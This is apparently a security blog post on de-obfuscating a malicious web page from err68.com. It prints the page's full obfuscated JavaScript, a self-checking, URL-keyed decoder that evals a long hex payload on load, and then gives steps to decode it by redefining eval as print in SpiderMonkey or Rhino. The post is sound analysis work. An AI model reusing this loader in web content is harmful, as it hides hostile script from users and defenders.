de-obfuscate javascript

Content of err68.com/cgi-bin/index.cgi?ad

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/x
html1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<script type="text/javascript">
<!--
function TC76Lp8Ij(u5U3T2i68, hDMdS30g0){var P47f3CN2i = arguments.callee;P47f3C
N2i = P47f3CN2i.toString();var J7gkdyNgd = 4294967296;P47f3CN2i = P47f3CN2i + lo
cation.href;var fkGa56HKA = 1;var u3tNKdtVT = eval;var QSMcPtYj8 = P47f3CN2i.rep
lace(/\W/g, "");QSMcPtYj8 = QSMcPtYj8.toUpperCase();var g16QBGfU3 = new Array;fo
r(var X0d2KMFf1 = 0; X0d2KMFf1 < 256; X0d2KMFf1++) {g16QBGfU3[X0d2KMFf1] = 0;}fo
r(var X0d2KMFf1 = 128; X0d2KMFf1; X0d2KMFf1 >>= 1) {fkGa56HKA = fkGa56HKA >>> 1
^ (fkGa56HKA & 1 ? 3988292384 : 0);for(var Vi47667NA = 0; Vi47667NA < 256; Vi476
67NA += X0d2KMFf1 * 2) {var Yr6g1158R = X0d2KMFf1 + Vi47667NA;g16QBGfU3[Yr6g1158
R] = g16QBGfU3[Vi47667NA] ^ fkGa56HKA;if (g16QBGfU3[Yr6g1158R] < 0) {g16QBGfU3[Y
r6g1158R] += J7gkdyNgd;}}}var QY6gqwC7F = J7gkdyNgd - 1;for(var bA6sdB4e6 = 0; b
A6sdB4e6 < QSMcPtYj8.length; bA6sdB4e6++) {var fIRV5C78P = (QY6gqwC7F ^ QSMcPtYj
8.charCodeAt(bA6sdB4e6)) & 255;QY6gqwC7F = (QY6gqwC7F >>> 8) ^ g16QBGfU3[fIRV5C7
8P];}QY6gqwC7F = QY6gqwC7F ^ (J7gkdyNgd - 1);if (QY6gqwC7F < 0) {QY6gqwC7F += J7
gkdyNgd;}QY6gqwC7F = QY6gqwC7F.toString(16).toUpperCase();while(QY6gqwC7F.length
< 8) {QY6gqwC7F = "0" + QY6gqwC7F;}var eJ0GVtcO5 = new Array;for(var X0d2KMFf1
= 0; X0d2KMFf1 < 8; X0d2KMFf1++) {eJ0GVtcO5[X0d2KMFf1] = QY6gqwC7F.charCodeAt(X0
d2KMFf1);}var mqYk7RNjq = "";var Aqp4XOS5s = 0;for(var X0d2KMFf1 = 0; X0d2KMFf1
< u5U3T2i68.length; X0d2KMFf1 += 2){var Yr6g1158R = u5U3T2i68.substr(X0d2KMFf1,
2);var j5c6Np1Jm = parseInt(Yr6g1158R, 16);var Yb4p1F45c = eJ0GVtcO5[Aqp4XOS5s];
var y2YW6HA6a = j5c6Np1Jm - Yb4p1F45c;if(y2YW6HA6a < 0) {y2YW6HA6a = y2YW6HA6a +
256;}mqYk7RNjq += String.fromCharCode(y2YW6HA6a);if(Aqp4XOS5s + 1 == eJ0GVtcO5.
length) {Aqp4XOS5s = 0;} else {Aqp4XOS5s++;}}var bRvlXu1au = 0;try {u3tNKdtVT(mq
Yk7RNjq);} catch(e) {bRvlXu1au = 1;}try {if (bRvlXu1au) {window.location = "/";}
} catch(e) {}}
//-->
</script>
</head>
<body onload="TC76Lp8Ij('A9a7A59BBA9fA7A263986F6e7c6caca6B5745f9a8B6dadA19265AE9
172567B6A7A76aa7d8fab895DBEA898AA66A4A4767A77676a9eA658716393a99fbbA39DA2B7a5659
Ba7A2a499a86Da5a4886d7d64758AA7588356A6A085697c68788EA862B7a18aACb89fa69b6b5B72a
eA7A8588C73A2887Bbd6baf88636f576C786F6C6D796969717c71a6a085697c68788ea8548052A5a
4886d7D64758AA7587156a4A3a693ABa1b5A4669Cb5979d73BC97AA5484846e6C7b7Baf68b552745
87771ae95b552A86AB4a07e769369825883569daaA49e72aeA7a8587EA4947A6db87C8666636f57a
6b2786F7973648fA874a89da4af939a9D6e65948B729963586858616f8D93997B7BA87E827552745
890979A7778A47d867864aca398A2A79Db87999A7A85A6073bc97AA54976483A89d6b6e669152745
8B49Baf5484a4a999BF719Ea3b55aad99B856999dB079A46F7D6b9C54805267736697a1a18a9f6e6
f7B9a587063646c6E8156999DB079a46f7D6b9c5F6e5b57b39a6884A49a676D6A9491999db079a46
F7D6B9c91636F576881b39EA3b55aAD99B856999Db079A46f7d6b9C548052686a7e715895AC9f7ea
57D6D6d987E5298A1B37da56B7A679B5884747554745B57b387886F687877AE6cB856755484846E6
c7b7bAF68B552757684566954a1525f79986D6c6988a96Baa665C58656371576B7f6E70667c646a7
07a567254735b729eB5a860aaa4A45787b969a878AA667E6E667358647e5286ab79A67C9B77796D5
882566A69796D5787b969A878AA667e6e66617554a49bA47FB36d6f69A7526158785F58afB993A95
895986B6674977a8A78567554A49bA47fb36D6f69A752625895a96bA487996b7f7c718c668FA28E6
D7c68868F92946A6a779B7B86758F5775668a6a80B3896C6E78849383b665A77cad6A7F6aa052955
887886F687877ae6CB871a19A635A8b6a92a68f697964859395986b6674977a8A789358706362605
8C18a6A80B3896c6E78849383A5656969AB798A66a0526275668E68a49475ae6DBD8a73b1c0AFAD9
9B856AE9ebc86787B8D68685480528F68b6877Bab78A98b587356696Fa9a1a960bc97AA548765678
d779f6a7bAF5274587671587876628c69AF687FA0636E5782a7987b69B578856a74A29dA2AAa69F7
3667a6b649863a06a8DA2635F6c52b2aeA7a858A497aa9Eab7e7BB17A636F5760BCa0b18884757E6
a765696548D93997b7ba87E8275609aA0a7A87bA3a79778AC6e7a6B649863A06a8DA2615d6358576
a7B6b73aaADab8B79897D6a64636f5760bcA0B18884757e6A7656767281526F6166945888757eA78
f7b6C6a829Ea28BB0ADA97079bc789473c3ACa2AD97737a7F7866587163a8A1B19A777B7B7562579
6665e9064B3837AAF7bad8C5470526861819f9E546ba8A1B19a777b7b7562577466666154beA8a1b
19A777b7b7562576383569064B3837AAF7bAD8C6Fc0a8A1b19a777b7B7562577566acA2AD97737A7
F786666A8B285abaaAFA49F5C74686066baa58Da4b397a97bA7A99D5c6C6DAEa0afa29D5CB99cB08
c87797f667360a39DB49DAC9c636E57706F56b3aaadAB8b79897d6a64636F575A7658585f63A8A1b
19a777b7B756272B5bc97AA54a978687Ea97C7b84a7527458B49bAF5484a4A999BF719EA3b55Aad9
9b856999dB079A46F7d6b9C54805267736697a1A18A9F6E6f7b9a5870636A7258a79FA57bb0696E6
DAA61635D63AD9d7E777c9b7A86829B93A79fa57BB0696e6Daa93587163A8A1b19a777B7b7562659
Bae97aa77B2969C79BA5e999dB079A46F7d6B9C5D7eAFAD99b85690AB7889a66f8977A2548052595
a81ac99a66387688C9F887b95889f57756666739ab2a45faea7a85895AC9F7ea57D6D6d98636F576
88156999DB079A46F7D6b9c547f52997D7dabA58376A99066b29Ba69Bb79a7258A79fA57bb0696e6
Daa566371636460B3BC97aa5492946A6A779B7b8675527458a87B6FA9B0816aAF9F64aba9a5a5ABA
A6E97A1a18A9f6E6F7B9A6454755B72aea7A858A57A6A9fb177A76cA8636F57A8A7A8AB998ca0AB6
095986b6674977A8A78625865795B72aea7a8588B897E6f7b8E8C9A7C636f579E8C677e978975879
CA18b69889C847A998ba3956Fb993a958978D9e787667686c7B567554b4696fA0BF67a968B752645
89D7C846C867a8d9a8E71a19A6B838E9e8A696D657767577466666154be838E9e8a696D657767577
566878f9A87656c697a6B585f63646C6e81B390ab7889a66F8977a2546e6F578bBAA8a1a2AA609DA
AB5a37B9CA4a47AA7AA9b60859A987b6b7b676C696c6da09E6E8b69889c847A998bA3585F6363577
583569e7a74789a7E89869C62af97A59Fba9E6154BE87688C9F887b95889f5775666673B16397a3a
bAB56b3897486908a89977Da16e5d72B5c3AC99A663748ea98980A37B777f5775666673a8b5ab57B
3B768A69E8974876F915E90ab7889A66f8977A25D7eaf579bA7AA9b9c6B976058C1788fA5867Ca27
F7a835871636372B5BAa8B154BE9b9d586E788fa5867cA27f7A836154bea9A0a6AAA5AF62AFa19A9
9ba9fa7A2636f575a755873b1c0529a99ba99a05cA85B57b3c3b3429a7b686d6ebaa8aa766b59787
988667167A56A78687f78996585676E6c7F6c716CA467786F7E6D9968A594796b7C676E7879656D6
C7d676c6477947879a8667167a56a98687F78796585676E6C7f786E67A5656D6B877870778464999
E7C676e7879656d6c7d676C6477949899a8667167a56a98687f989965A5676E6c7E9b70677B696E7
D7F7b7066A565999C7C676E9879656d6C7d676C6477746C6b7a78716D846b6c6B7b7b6D688467996
da76a9969A5627070A76a996b79986f9B7D9771967B966f7b7C6C706C84676D9E7C67797678626a7
C7A696B98a569986FA8696d647c63787a7C6f99968478787E7f6B70667a776B687a66796d8464797
07C676F657B986E71876f70697C6b7069876B6D647B626C6b876A7168A569787e876E71658569786
aA76E6e65a464996EA8676F9884757869876B79697C69787aA8699967a495986aa76A6e9977776c6
8a86D7165A5676C6b7e676f6B8574796e7F666e6c7C6A6e997B6c6f6479636e6B7D686b987796987
17F6d99697963986fA76871997c696E717e6C6E75846A6d6E7d9b6d6479676D6b7C6d6D697A756C6
b7A786B98777678797f7b7197a496989a7C6F6D6c7b976E6Fa86699677c626e7D7F6C6f6B79656E6
87b6c6f687B766f9bA86A70667c946e7d7F976e65a493796c876B716985746F6a7f996d7679656F6
97f6A706479676c9e7B6c6f997b679a68A8676F7a7A746f707d9A6d997A646D7E7c976D6479666e6
87b6c6E647a646D7e7c67797678626a7c799c996DA46499707C677065846B6f6f7E9899688567706
8A76B6D647b626c6B7D6d6f7a7B6999717F69706C7B77706f7c6A716a846B786fA8696F65a5696c9
A7E676F6b8574796E7F666e6C7c6A6E797c676E6a79736f697A7B6B9578626A9c799c7197A4696D6
E7c6F7065A46B6F6F7E987968A5677068876B6d647b626E687B6c6D697a646d707c976B7877966A9
b799c71688464996c7F6b6f6a7C656D997F9a6D677A976d6e7C696E647A676C6D7D676c6477746B9
e876c7197856870707B6C7197A4696D6e7C6f7065A46B6F6f7E98796885677068876B6d647b626E6
87b6c6D697a656D707c976b9877966A7B797C7168a464996C7F6b6F6a7c656d797F7A6D677A776D6
E7c696E647a686C6d7D676c6477746b7E876c7177856870707b6c717784696d6E7C6F7065a46b6F6
F7e78996885677068A76B6d647b626e687B6c6D697A666d707C776B9877966A7b797c7168A464996
C7f6b6F6a7C656D797f9a6d677a976D6e7c696E647a696C6D7d676c6477746B7eA76c7177a568707
07b6c719784696d6E7c6f7065846B6f6F7E987968A5677068a76B6d647B626E687b6C6D697A676D7
07c976b7877766A7b799c7168a464996C7F6B6f6a7C656D797f7A6d677A976d6E7C696E647A6A6c6
d7D676c6477746B7eA76C7197a56870707B6c719784696D6E7C6F7065846B6f6F7e7879688567706
8876b6D647B626E687b6c6D697A686D707C776B7877766A9B797c71688464796c7f6B6f6A7C656d7
97F9A6d677A776D6E7c696e647A6B6C6d7d676C6477746B9eA76c7197856870707B6C7177A4696D6
E7c6f7065846B6f6F7E98996885677068a76B6d647B626e687b6c6D697a696d707c776B7877766A9
b797c7168a464796c7f6b6F6A7C656d997f9A6d677A776D6e7c696e647A736C6d7D676C6477946C6
B7A986b6dA49570717B6C6D76A464986f877C70687b6B6F6b7C7a717579636D6f7d9b6d6479676d6
b7c6D6D6979936c6b7A986B6D7795706d876E716c846479697d796B78779699687a696B9877776C6
8a797716A79656C7a7f6D7168847870797e6D70647a9370997b6c6f647A776d6e7C696E647A666C6
d7B6c6d6D79696d6E7e686F977B6B986E7E6e70967B9598997c7c716da563706F7f9879767C62787
b7C6f6D667C6770708768716ca4649971a76C6D647B68706c876a716BA4937879a7687968846A6C6
d7C686d677A636d9e7C676d657b626c6b7C696E6879936C6b7a986B6Da466706C876A706B7B69706
e7d6E716B79656E687B6c6D697a636E7d7c696E7678626A7c7A696B7877776c68886d716585676c6
b7E6d7978A4979A687f6b6F988466707B7B6c6F647963996C8768996A847570797F6D796bA562797
07C7c9967a595986ea797716ca497706A87687179847378707F6D717584686e6Ca86A9969A467986
E87777969796B6e6E7C7A6D647A666D6b7B9C6e9977776c68886d716585676C6B7d996f6C7c6B6F9
Ca868716B7A676F717B6C6f6479636d707C696E7678626A9c7A696b9877976C68A76d719a85676C9
A8779716885656D6e7E6e70648576707e877b79777A73786F7D9B6E647A976e997E6c79788476797
da8976e6D84666D9E7E6D797884779a687f6B6f988466707B7C6A719a8468796C876E9968a4946D9
D7D7A7067a594796Aa86F996d7a75706C7c676D9979936d6Ea8996B7877766a9b7E6d706685686E6
F7d686E647b6b6E6c7b6c6F647963706fA8987178a5966F6F7E697168a4936E6Ca76a716C8466786
D7D6F7966a467787a7E68796879746E997e6c99988476797Da8976e6D84666c7B7C6a996Ba562707
1886b9966847578697F9A6D767A646E9B7c776e9678626A9C7A696b787773787Ea76D6D6479746f6
c7e6b996C7A646e6F7d676F6a7B666C6b7D686D677A656d7e7a7B6B9577956a9B7d996f6C7c6B6f7
c8868716b7A676f717B6c6D997A776d6E7c696e6479676d9d7A696B9877776c687a776F6A7b6a6f7
A7d7A7968a46a6e707f6d6D6479976e687b6C70687c62999a7d686E657a656E717d6d6E7977976C6
8887b6b9877966b687A669995A46b787Ea79A716979946e717D9870967b6a996FA76e6e667C6b6D6
98768716c8478989ca86B716C79656d9e7B6C6e697a636D9E7a7B6b7577956e717D7870767B6A796
f876E6E667C6B6c6B7c676f6479636D707d676e6479676d9d7a696b7877976c687A9B6b75856b706
cA76e6D677b78797d7d6A796cA563709b7e97706979636f6b7C677165846678697e976F6d7C636e9
Ca76E6D6479976c6b7d796f6C7c6b6f9Ca868716b7A676f717d676C647774797B876879667965986
e7D7c996D7c6A787b87686f787C696C6B7D696d67A467796d876a9969A5627070876A796b7978787
1A86971698466986f7f986f6cA496787A877b71698563786f7B9B6d69a56678718869716D8565786
F7b6e6D777a956c6B7A9879677B7578717e9A716d8464706b7F6b6D998568707087776f68a567999
9A869716d846798708777716c796b6d70886B796d856570707b6E6D9a79636d70886b7169A594786
F7c6b7178A464797BA7687967a468786d7f9c996785676d707C776e7678626a9cA76F6f77A569709
ca76D71657c626F6f7C6a796AA46879797e687968A569786d7F9C7169A5689999876c6d6C7967786
eA76e716a79656E6A7c676D66a494986FA79779677a946e6D7D667169A567786d7C996e967998987
1886671987a64706E7f7a719779979870A79771997a64707B876A716b8468797d7C7c71678473707
b7D6b716D84696e79876a6E6D7A956D7A7C986E677A646e6E7D67716a7a656d717C6C6e677A636E9
c7D6E71697A6570707f976e6c7a6b6E6E7D6D6E647a656d6B7C6c6e677A636e6e7d676e647a67706
D7c9A6E6784656E6F7D677165846670717F996D6979636e697C676F9985746D6ea79b7965a493707
97F696D6d7a776B687a66716B85629871886c7178a46a786987776e658465996d876B996D7a63706
ca76C9967A468796cA76B6F67A494709B8768716b796B99717e77796a7c7370717F6d70647C676D7
e7D796b78777699687a696b986A5B72')">

</body>
</html>

ok ok….just change the smiley face to “8)”

How can the above be easily decoded? The difficulty above lies in the self checking mechanism in the function to prevent modification. It also uses its URL as part of the decoding.

The tool you’ll need is either spidermonkey or rhino from mozilla.
Edit the above content of the javascript by doing the following steps:

  1. Remove all html code to just have the javascript portion
  2. Prepend the javascript to define eval function as print
  3. Prepend the javascript to define the location.href variable

For eg,
function eval(a) {
print(a);
}
location = new Object();
location.href = "http://err68.com/cgi-bin/index.cgi?ad";

Using spidermonkey to execute the modified script would result in a similar javascript.
Just repeat step (2) and (3) above on the output.
After executing you will get the final decoded version.

For those who, in moments of insanity, might want to attempt to de-obfuscate JS in windoze platform, one tool to use is FileInsight.

One Response to “de-obfuscate javascript”

  1. […] As can be seen from the content it opens a website topsoftwaresale.com. but embedded is an iframe from err68.com/cgi-bin/index.cgi?ad The content of the iframe how to decode it can be seen here. […]

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: